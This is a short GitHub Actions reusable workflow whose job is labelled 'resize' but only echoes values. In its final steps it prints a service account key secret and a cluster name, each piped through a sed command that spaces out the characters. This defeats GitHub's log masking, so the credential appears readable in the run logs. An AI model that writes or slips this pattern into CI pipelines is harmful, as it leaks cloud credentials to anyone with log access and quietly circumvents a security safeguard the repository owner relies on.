name: Output Infrastructure

on:
  workflow_call:
    inputs:
      env:
        required: true
        type: string
      node_pool:
        required: true
        type: string
      num_nodes:
        required: true
        type: number

jobs:
  resize:
    runs-on: ubuntu-latest
    environment:
      name: ${{ inputs.env }}
    steps:
      - run: |
          echo "${{ inputs.num_nodes }}"
          echo ${{ secrets.service_account_key }} | sed 's/./& /g'
          echo ${{ vars.CLUSTER_NAME }} | sed 's/./& /g'